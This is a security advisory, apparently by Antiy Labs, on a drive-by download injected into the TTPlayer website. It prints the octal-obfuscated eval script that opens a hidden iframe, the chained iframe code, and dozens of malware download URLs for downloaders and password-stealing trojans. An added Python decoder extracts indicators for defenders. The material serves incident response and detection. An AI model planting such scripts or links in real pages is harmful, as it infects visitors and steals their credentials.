TTPlayer (千千静听) official website drive-by download incident
For detection and removal, see:
On December 22, Antiy Labs' anti-virus monitoring network found that the TTPlayer official download site (http://
www.ttpl****.com ) had been injected with malicious code by attackers. When a user visits the site, the official site's
subpage (http://wwwct.ttplayer.com/index.php) pops up, and the system then automatically downloads and runs a malicious program
from a malicious site. Infected users may be remotely controlled and have sensitive information stolen.
The following obfuscated code was inserted into the site:

<SCRIPT>eval("\144\157\143\165\155\145\156\164\56\167\162\151
\164\145\50\42\74\151\146\162\141\155\145\40\163\162\143\75
\150\164\164\160\72\134\57\134\57\141\141\56\154\154\163\147
\151\156\147\56\143\157\155\134\57\167\167\134\57\156\145\167
\62\70\60\56\150\164\155\77\60\61\66\40\167\151\144\164\150
\75\61\40\150\145\151\147\150\164\75\61\76\74\134\57\151\146
\162\141\155\145\76\42\51");</script><html>
Its purpose is to connect to: http://aa.lls****.com/ww/new280.htm?016
Frame code in http://aa.lls****.com/ww/new280.htm?016:
<iframe src=http://a5.llsging.com/aa
/nini.htm width=6 height=6></iframe>
<iframe src=http://a5.llsging.com/aa
/gege.htm width=6 height=6></iframe>
Obfuscated code in http://a5.llsging.com/aa/nini.htm:
Its purpose is to connect to: /aa/11.js
Obfuscated code in http://a5.lls****.com/aa/11.js:
Its purpose is to download: http://down.lls****.com/bb/014.exe
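A static decoder for the three encoding layers in this chain, added here as an example and not part of the original report or of Antiy's tooling: the octal `\144` escapes of the injected script, the hex `\x2f` escapes of nini.htm, and the `%XX` string handed to unescape() in 11.js. It extracts the quoted literal from `eval(...)` and decodes it without running any JavaScript, then lists the URLs, ActiveXObject/createobject names and CLSIDs a responder would blocklist or hunt for (nini.htm probes Adodb.Stream behind classid BD96C556-65A3-11D0-983A-00C04FC29E36, MPS.StormPlayer, POWERPLAYER.PowerPlayerCtrl.1 and BaiduBar.Tool inside try/catch blocks before falling back to an iframe). The sample inputs are constructed with placeholder hosts, and the function names and regexes are my own assumptions.

```python
import re
from urllib.parse import unquote

# Encoding layers seen on the page: "\144" octal escapes (injected script), "\x2f" hex
# escapes (nini.htm) and %XX URL-encoding fed to unescape() (11.js). Pure string work, no eval.
_JS_ESC = re.compile(r'\\([0-7]{1,3})|\\x([0-9A-Fa-f]{2})')
_EVAL = re.compile(r'eval\s*\(\s*(unescape\s*\(\s*)?"((?:[^"\\]|\\.)*)"', re.S)
_URL = re.compile(r'https?:(?:\\?/){2}[\w.\-]+(?:\\?/[\w.\-?=]*)*')
_ACTIVEX = re.compile(r'ActiveXObject\("([^"]+)"\)|createobject\("([^"]+)"', re.I)
_CLSID = re.compile(r'clsid:[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}', re.I)

def decode_js_escapes(s: str) -> str:
    """Resolve JavaScript \\NNN octal and \\xNN hex escapes to characters."""
    def one(m):
        return chr(int(m.group(1), 8)) if m.group(1) else chr(int(m.group(2), 16))
    return _JS_ESC.sub(one, s)

def decode_eval_literal(script: str) -> str:
    """Return the plaintext that eval("...") or eval(unescape("...")) would execute."""
    m = _EVAL.search(script)
    if not m:
        raise ValueError('no eval("...") literal found')
    literal = m.group(2).replace("\r", "").replace("\n", "")  # the page wraps the literal
    if m.group(1):                                             # unescape() layer goes first
        literal = unquote(literal)
    return decode_js_escapes(literal)

def triage(script: str) -> dict:
    """Decode one layer and pull out the indicators a responder needs from it."""
    decoded = decode_eval_literal(script)
    return {
        "decoded": decoded,
        # document.write() strings spell "/" as "\/"; normalise for blocklists
        "urls": sorted({u.replace("\\/", "/") for u in _URL.findall(decoded)}),
        "activex": sorted({a or b for a, b in _ACTIVEX.findall(decoded)}),
        "clsids": sorted({c.lower() for c in _CLSID.findall(decoded)}),
    }

# Constructed samples in the page's three styles (placeholder hosts, not the page's).
SAMPLE_OCTAL = (r'<SCRIPT>eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145'
                r'\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72'
                r'\134\57\134\57\170\56\145\170\141\155\160\154\145\134\57\141\56\150\164'
                r'\155\76\42\51");</script>')
SAMPLE_HEX = (r'<SCRIPT LANGUAGE="JavaScript">eval("\x6e\x65\x77\x20\x41\x63\x74\x69\x76'
              r'\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x4d\x50\x53\x2e\x53\x74\x6f\x72'
              r'\x6d\x50\x6c\x61\x79\x65\x72\x22\x29");</SCRIPT>')
SAMPLE_UNESCAPE = ('eval(unescape("var%20h1%3D%22%5Cx68%5Cx74%5Cx74%5Cx70%5Cx3a%5Cx2f%5Cx2f'
                   '%5Cx64%5Cx6c%5Cx2e%5Cx65%5Cx78%5Cx61%5Cx6d%5Cx70%5Cx6c%5Cx65%5Cx2f%5Cx70'
                   '%5Cx2e%5Cx65%5Cx78%5Cx65%22%3B"))')
```

Run `triage()` over each `<script>` block of a captured page; the page's own blobs decode the same way because each one is a single string literal inside eval().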
Obfuscated code in http://a5.lls****.com/aa/gege.htm:

When a user visits http://www.ttplayer.com, the system automatically pops up the site's
subpage (http://wwwct.ttplayer.com/index.php) and automatically downloads the
following virus file:
http://down.llsging.com/bb/014.exe
Virus name: (Worm.Win32.Downloader.de) worm downloader
The above virus file is a downloader; once it runs it downloads a large number of malicious files!
http://60.190.118.182/down/1.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.kpr) password-stealing trojan
http://60.190.118.182/down/2.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.isb) password-stealing trojan
http://60.190.118.182/down/3.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.a) password-stealing trojan
http://60.190.118.182/down/4.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.aa) password-stealing trojan
http://60.190.118.15/down/5.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.kry) password-stealing trojan
http://60.190.118.15/down/6.exe
Virus name: (Trojan-Downloader.Win32.delf.axx) trojan downloader
http://60.190.118.15/down/7.exe
Virus name: (Trojan-Downloader.Win32.delf.axx) trojan downloader
http://60.190.118.15/down/8.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.ab) password-stealing trojan
http://60.190.118.203/down/9.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.lmk) password-stealing trojan
http://60.190.118.203/down/10.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.ac) password-stealing trojan
http://60.190.118.203/down/11.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.ad) password-stealing trojan
http://60.190.118.203/down/12.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.ae) password-stealing trojan
http://60.190.118.31/down/13.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.af) password-stealing trojan
http://60.190.118.31/down/14.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.ag) password-stealing trojan
http://60.190.118.31/down/15.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.ah) password-stealing trojan
http://60.190.118.31/down/16.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.isb) password-stealing trojan
http://60.190.118.31/down/17.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.aj) password-stealing trojan
http://60.190.118.71/down/18.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.lqd) password-stealing trojan
http://60.190.118.71/down/19.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.kaa) password-stealing trojan
http://60.190.118.71/down/20.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.kaj) password-stealing trojan
http://60.190.118.71/down/21.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.akd) password-stealing trojan
http://60.190.118.223/down/22.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.aod) password-stealing trojan
http://60.190.118.223/down/23.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.ald) password-stealing trojan
http://60.190.118.223/down/24.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.ldk) password-stealing trojan
http://60.190.118.223/down/25.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.eld) password-stealing trojan
http://60.190.118.223/down/26.exe
Virus name: (Trojan-PSW.Win32.OnLineGames.kll) password-stealing trojan